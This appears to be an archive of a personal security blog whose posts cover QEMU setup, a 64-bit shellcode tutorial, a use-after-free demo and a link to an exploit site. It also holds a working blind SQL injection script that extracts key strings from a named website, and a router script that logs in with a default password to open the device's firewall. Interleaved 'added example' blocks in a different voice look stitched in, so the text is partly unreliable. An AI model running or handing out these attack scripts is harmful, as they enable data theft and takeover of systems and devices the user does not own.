2016. 2. 21. 22:09

I keep forgetting this, so writing it down.


Where to download the QEMU images:

https://people.debian.org/~aurel32/qemu/


Install the required packages -> download the image files and start QEMU with the port redirections as below:




# qemu-system-mips -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mips_standard.qcow2 -append "root=/dev/sda1 console=tty0" -redir tcp:2222::22 -redir tcp:8080::80 --nographic


After that, files can also be moved in and out of the guest with scp (through the redirected port 2222).



Posted by k1rha
2015. 12. 21. 15:12

Stop typing shellcode in by hand like an idiot.


Some assembly required

We begin our journey by writing assembly to launch a shell via the execve system call.

For backwards compatibility, 32-bit Linux system calls are supported in 64-bit Linux, so we might think we can reuse shellcode targeted for 32-bit systems. However, the execve syscall takes a memory address holding the NUL-terminated name of the program that should be executed. Our shellcode might be injected someplace that requires us to refer to memory addresses larger than 32 bits. Thus we must use 64-bit system calls.

The following may aid those accustomed to 32-bit assembly.

                   32-bit syscall                        64-bit syscall
instruction        int $0x80                             syscall
syscall number     EAX, e.g. execve = 0xb                RAX, e.g. execve = 0x3b
up to 6 inputs     EBX, ECX, EDX, ESI, EDI, EBP          RDI, RSI, RDX, R10, R8, R9
over 6 inputs      in RAM; EBX points to them            forbidden
example            mov $0xb, %eax                        mov $0x3b, %rax
                   lea string_addr, %ebx                 lea string_addr, %rdi
                   mov $0, %ecx                          mov $0, %rsi
                   mov $0, %edx                          mov $0, %rdx
                   int $0x80                             syscall

We inline our assembly code in a C file, which we call shell.c:

int main() {
  asm("\
needle0: jmp there\n\
here:    pop %rdi\n\
         xor %rax, %rax\n\
         movb $0x3b, %al\n\
         xor %rsi, %rsi\n\
         xor %rdx, %rdx\n\
         syscall\n\
there:   call here\n\
.string \"/bin/sh\"\n\
needle1: .octa 0xdeadbeef\n\
  ");
}

No matter where in memory our code winds up, the call-pop trick will load the RDI register with the address of the "/bin/sh" string.

The needle0 and needle1 labels are to aid searches later on; so is the 0xdeadbeef constant (though since x86 is little-endian, it will show up as EF BE AD DE followed by 4 zero bytes).

For simplicity, we’re using the API incorrectly; the second and third arguments to execve are supposed to point to NULL-terminated arrays of pointers to strings (argv[] and envp[]). However, our system is forgiving: running "/bin/sh" with NULL argv and envp succeeds:

ubuntu:~$ gcc shell.c
ubuntu:~$ ./a.out
$

In any case, adding argv and envp arrays is straightforward.

The shell game

We extract the payload we wish to inject. Let’s examine the machine code:

$ objdump -d a.out | sed -n '/needle0/,/needle1/p'
00000000004004bf <needle0>:
  4004bf:       eb 0e                   jmp    4004cf <there>

00000000004004c1 <here>:
  4004c1:       5f                      pop    %rdi
  4004c2:       48 31 c0                xor    %rax,%rax
  4004c5:       b0 3b                   mov    $0x3b,%al
  4004c7:       48 31 f6                xor    %rsi,%rsi
  4004ca:       48 31 d2                xor    %rdx,%rdx
  4004cd:       0f 05                   syscall

00000000004004cf <there>:
  4004cf:       e8 ed ff ff ff          callq  4004c1 <here>
  4004d4:       2f                      (bad)
  4004d5:       62                      (bad)
  4004d6:       69 6e 2f 73 68 00 ef    imul   $0xef006873,0x2f(%rsi),%ebp

00000000004004dc <needle1>:

On 64-bit systems, the code segment is usually placed at 0x400000, so in the binary our code starts at offset 0x4bf and finishes right before offset 0x4dc. This is 29 bytes:

$ echo $((0x4dc-0x4bf))
29

We round this up to the next multiple of 8 to get 32, then run:

$ xxd -s0x4bf -l32 -p a.out shellcode

Let’s take a look:

$ cat shellcode
eb0e5f4831c0b03b4831f64831d20f05e8edffffff2f62696e2f736800ef
bead
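The objdump/echo/xxd steps above can be automated. The following is an added example, not code from the original post: it parses the objdump listing shown above (embedded here as a constructed string) and collects bytes by address, which matters because objdump decoded the "/bin/sh" string bytes as an imul instruction that swallows needle1's first byte. It also reports where the NUL bytes sit, since the string terminator is one.

```python
import re

# Constructed input: the objdump listing above, as a string so this runs offline;
# in practice pipe in "objdump -d a.out | sed -n '/needle0/,/needle1/p'".
LISTING = """\
00000000004004bf <needle0>:
  4004bf:       eb 0e                   jmp    4004cf <there>
00000000004004c1 <here>:
  4004c1:       5f                      pop    %rdi
  4004c2:       48 31 c0                xor    %rax,%rax
  4004c5:       b0 3b                   mov    $0x3b,%al
  4004c7:       48 31 f6                xor    %rsi,%rsi
  4004ca:       48 31 d2                xor    %rdx,%rdx
  4004cd:       0f 05                   syscall
00000000004004cf <there>:
  4004cf:       e8 ed ff ff ff          callq  4004c1 <here>
  4004d4:       2f                      (bad)
  4004d5:       62                      (bad)
  4004d6:       69 6e 2f 73 68 00 ef    imul   $0xef006873,0x2f(%rsi),%ebp
00000000004004dc <needle1>:
"""

SYMBOL = re.compile(r"^([0-9a-f]+) <(\w+)>:$")
INSN = re.compile(r"^\s+([0-9a-f]+):\s+((?:[0-9a-f]{2}\s)+)")

def extract_shellcode(listing, start="needle0", end="needle1"):
    """Bytes in [start, end), collected by address rather than by instruction:
    objdump decoded the trailing string as an imul whose immediate swallows
    needle1's first byte (0xef), so naive concatenation would give 30, not 29."""
    symbols, memory = {}, {}
    for line in listing.splitlines():
        m = SYMBOL.match(line)
        if m:
            symbols[m.group(2)] = int(m.group(1), 16)
            continue
        m = INSN.match(line)
        if m:
            base = int(m.group(1), 16)
            for offset, byte in enumerate(m.group(2).split()):
                memory[base + offset] = int(byte, 16)
    lo, hi = symbols[start], symbols[end]
    gaps = [a for a in range(lo, hi) if a not in memory]
    if gaps:
        raise ValueError("listing has no bytes at %#x" % gaps[0])
    return bytes(memory[a] for a in range(lo, hi))

def nul_offsets(code):
    """Offsets of 0x00 bytes; the "/bin/sh" terminator is one."""
    return [i for i, b in enumerate(code) if b == 0]
```

`extract_shellcode(LISTING).hex()` gives the first 29 bytes of the `cat shellcode` output above; the trailing `efbead` there is just the needle1 padding.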


Posted by k1rha
2015. 10. 24. 16:20

#!/usr/bin/python

import urllib2, urllib, time

# select database()

#query = "1 and (substr((lpad(bin(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))),7,0)),1,1)=1)"

#5F5F5F5F5F5F5F5F5F5F5F5F313339313533363335

target = "select group_concat(keystr) from KeyDB.kt1509 where signature like 0x3234306136346465633530615F5F5F5F5F5F5F5F"

x = 0
answer = ""

while 1:
    x += 1
    ch = 0

    # one request per bit of the 7-bit binary string lpad(bin(ascii(...)),7,0) of the x-th character
    for i in range(1, 8):
        url = "http://poworks.com/index.php/forum/?cid=0&show="
        #att = "1 and ascii(substr((%s),%d,1))=%d"%(target,x,i)
        att = "1 and (substr((select lpad( bin( ascii(substr((%s),%d,1)) ),7,0)) ,%d,1)=1)#" % (target, x, i)
        att = urllib.quote(att)
        url += att

        req = urllib2.Request(url)
        result = urllib2.urlopen(req).read()
        #print result

        # the page content differs depending on whether the injected condition was true
        r = result.find("No replies posted yet.")
        if r > -1:
            ch += 2 ** (7 - i)
        else:
            pass

    if ch == 0:
        # all bits zero: ran past the end of the result
        break
    else:
        answer += chr(ch)
        print ":) : " + answer

print "END : ", answer
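From the defender's side, the script above leaves a very recognisable trace: seven near-identical requests per extracted character, each carrying substr(...) wrapped around lpad(bin(ascii(substr(...)))) in a query parameter. The following is an added example, not part of the original post, that flags that chain in constructed common-log-format lines and counts hits per client.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines, not real traffic: two requests shaped like the
# ones the script above sends (same payload, bit index 1 then 2) from one client,
# and two benign requests, one of which merely mentions the function names.
LOG_LINES = [
    '10.0.0.5 - - [24/Oct/2015:16:20:01 +0900] "GET /index.php/forum/?cid=0&show=1%20and%20%28substr%28%28select%20lpad%28%20bin%28%20ascii%28substr%28%28select%20user%28%29%29%2C1%2C1%29%29%20%29%2C7%2C0%29%29%20%2C1%2C1%29%3D1%29%23 HTTP/1.1" 200 5123',
    '10.0.0.5 - - [24/Oct/2015:16:20:01 +0900] "GET /index.php/forum/?cid=0&show=1%20and%20%28substr%28%28select%20lpad%28%20bin%28%20ascii%28substr%28%28select%20user%28%29%29%2C1%2C1%29%29%20%29%2C7%2C0%29%29%20%2C2%2C1%29%3D1%29%23 HTTP/1.1" 200 4871',
    '10.0.0.9 - - [24/Oct/2015:16:20:02 +0900] "GET /index.php/forum/?cid=0&show=12 HTTP/1.1" 200 5123',
    '10.0.0.9 - - [24/Oct/2015:16:20:03 +0900] "GET /index.php/forum/?cid=0&q=substring+lpad+bin+ascii HTTP/1.1" 200 2210',
]

# The chain the script above relies on to read a value one bit at a time:
# substr(...) wrapped around lpad(bin(ascii(substr(...)))). Each function is
# harmless alone; nested like this inside a query parameter it is a strong signal.
BIT_CHAIN = re.compile(r"\bsubstr\w*\s*\(.*\blpad\s*\(\s*bin\s*\(\s*ascii\s*\(", re.I | re.S)

def suspicious_params(request_line):
    """(name, decoded value) for every query parameter of one
    'METHOD /path?query HTTP/x' request line that matches BIT_CHAIN."""
    target = request_line.split()[1]
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return [(name, v) for name, values in query.items()
            for v in values if BIT_CHAIN.search(v)]

def scan(log_lines):
    """Count matching requests per client IP. One exfiltrated character costs
    seven such requests, so a real extraction shows up as a burst."""
    per_ip = Counter()
    for line in log_lines:
        client, request = line.split(" ", 1)[0], line.split('"')[1]
        if suspicious_params(request):
            per_ip[client] += 1
    return per_ip
```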



Posted by k1rha
2015. 9. 15. 14:03

busybox static prebuild binary


http://www.busybox.net/downloads/binaries/1.16.1/



busybox-armv4eb          29-Mar-2010 20:49  1.0M
busybox-armv4l           29-Mar-2010 20:49  1.0M
busybox-armv4tl          29-Mar-2010 20:50  1.1M
busybox-armv5l           29-Mar-2010 20:50  1.1M
busybox-armv6l           29-Mar-2010 20:50  1.1M
busybox-i486             29-Mar-2010 20:50  878K
busybox-i586             29-Mar-2010 20:50  878K
busybox-i686             29-Mar-2010 20:50  878K
busybox-mips             29-Mar-2010 20:50  1.6M
busybox-mips64           29-Mar-2010 20:51  1.5M
busybox-mipsel           29-Mar-2010 20:51  1.6M
busybox-powerpc          29-Mar-2010 20:51  1.1M
busybox-powerpc-440fp    29-Mar-2010 20:49  1.1M
busybox-sh4              29-Mar-2010 20:51  958K
busybox-sparc            29-Mar-2010 20:51  1.1M
busybox-x86_64           29-Mar-2010 20:51  950K
config-busybox           29-Mar-2010 20:55   21K


Posted by k1rha
2015. 9. 11. 19:21

call addr =  push <return address: eip + size of the call instruction>
             jmp addr

leave     =  mov esp, ebp
             pop ebp

ret       =  mov eip, [esp]
             add esp, 4        ; i.e. pop eip

Posted by k1rha
2015. 9. 10. 19:13



http://0day.today/exploit/24222


There are some useful things here. Saving the link for now.


Posted by k1rha
2015. 9. 2. 16:43

ARM32 netcat static compile 


nc_arm32_static


Posted by k1rha
2015. 8. 19. 10:13

UAF example code I wrote for a seminar



#include <iostream>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

using namespace std;

class B
{
public:
    char *v1 = NULL;
    virtual void foo(int a)
    {
        cout << "B Foo Call" << a << endl;
    }
};

class D : public B
{
public:
    char *buff;
    void foo(int a)
    {
        cout << "D Foo Call " << a << endl;
    }
};

// E is the same size as D (vtable pointer + two pointers = 24 bytes on 64-bit),
// so "new E" below gets handed the chunk that "delete d" just freed.
class E
{
public:
    char buff[24] = "";
    void test(int a){
        cout << "E->TEST " << endl;
    }
    void copy(char *v2){
        memcpy(buff, v2, 20);   // user input lands where D's vtable pointer used to be
    }
};

int foo3(){
    cout << "This is UNUSING FOO " << endl;
    return 0;
}

int (*funcAddr)() = foo3;

int main(int argc, char *argv[]){
    char *test;
    B *d, *b;
    E *e;

    if (argc < 2) {
        fprintf(stderr, "usage: %s <input>\n", argv[0]);
        return 1;
    }

    printf("-------------------------------\n");
    printf("[PRINT] UNUSING FOO function addr %p \n", (void *)&funcAddr);   // %p, not %x, for a pointer
    printf("-------------------------------\n");

    d = new D;
    delete d;           // d is now a dangling pointer

    e = new E;          // reuses the chunk freed above
    e->copy(argv[1]);   // overwrites the stale D object's contents

    printf("d->foo(9) call \n");
    d->foo(9);          // use after free: virtual dispatch through whatever is in the chunk now

    return 0;
}



Posted by k1rha
2015. 7. 28. 20:10

The SSL encryption process


Posted by k1rha
2015. 7. 12. 13:33

Talking to a web app while keeping the session



import httplib
import urllib
import urllib2
import os
import time
import getpass
import sys
import telnetlib

RouterIP = "192.168.123.1"


def HttpAdminLogin():
    #print ":::     CONNECT ADMIN SESSION     "
    loginURL2 = "http://" + RouterIP + "/ap_login.asp"
    params2 = {"page": "ap_login.asp", "http_passwd": "YWRtaW4=", 'hidden_action': "Login"}
    params2 = urllib.urlencode(params2)
    try:
        conn = urllib2.Request(loginURL2, params2)
        conn.add_header("Content-Type", "application/x-www-form-urlencoded")
        response = urllib2.urlopen(conn)
        cookie = response.headers.get('Set-Cookie')  ## grab the cookie value here
    except:
        print "CONNECTION ERROR "
        return

    time.sleep(1)

    ## iptables OPEN
    print ":::     IPTABLES FIREWALL IS OPENED      "
    loginURL = "http://" + RouterIP + "/test.asp"
    params = {"page": "ap_login.asp", "http_passwd": "YWRtaW4=", 'hidden_action': "Login"}
    params = urllib.urlencode(params)
    try:
        conn = urllib2.Request(loginURL, params)
        conn.add_header("Content-Type", "application/x-www-form-urlencoded")
        conn.add_header("cookie", cookie)  ## send the saved cookie value here
        response = urllib2.urlopen(conn)
    except:
        print "IPTABLES FIREWALL OPEN FAIL"
        return


def main():
    global RouterIP  # without this the assignment below only creates a local variable
    try:
        RouterIP = sys.argv[1]
    except:
        RouterIP = "192.168.123.1"

    print ":::     Home Router IP -> " + str(RouterIP)
    HttpAdminLogin()


if __name__ == "__main__":
    main()
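The same login-then-reuse-session flow with a cookie jar instead of copying the raw Set-Cookie header, as an added example that is not the author's script. It talks to a constructed local stand-in for the router so it runs offline; the page names and the http_passwd field come from the script above, the session token is made up, and the stand-in answers 200 for everything so the body alone tells the outcome.

```python
import http.cookiejar
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the router: a local server with the two pages the
# script above talks to. Nothing here comes from the real device's firmware.
class FakeRouter(BaseHTTPRequestHandler):
    SESSION = "SESSION=constructed-token"

    def do_POST(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        form = urllib.parse.parse_qs(body.decode())
        logged_in = self.SESSION in self.headers.get("Cookie", "")
        if self.path == "/ap_login.asp" and form.get("http_passwd") == ["YWRtaW4="]:
            reply, cookie = b"login ok", self.SESSION + "; Path=/; HttpOnly"
        elif self.path == "/test.asp" and logged_in:
            reply, cookie = b"authorized", None
        else:
            reply, cookie = b"denied", None
        self.send_response(200)
        if cookie:
            self.send_header("Set-Cookie", cookie)
        self.send_header("Content-Length", str(len(reply)))
        self.end_headers()
        self.wfile.write(reply)

    def log_message(self, *args):  # keep the test output quiet
        pass

def start_fake_router():
    server = HTTPServer(("127.0.0.1", 0), FakeRouter)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server

def admin_session(base_url, password_b64):
    """Log in once, then reuse the session on test.asp. The jar sends back only
    the cookie's name=value pair; the script above copies the whole Set-Cookie
    value, attributes like Path and HttpOnly included, into the Cookie header."""
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    form = urllib.parse.urlencode({"page": "ap_login.asp",
                                   "http_passwd": password_b64,
                                   "hidden_action": "Login"}).encode()
    opener.open(base_url + "/ap_login.asp", form).read()
    return opener.open(base_url + "/test.asp", form).read().decode()
```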



Posted by k1rha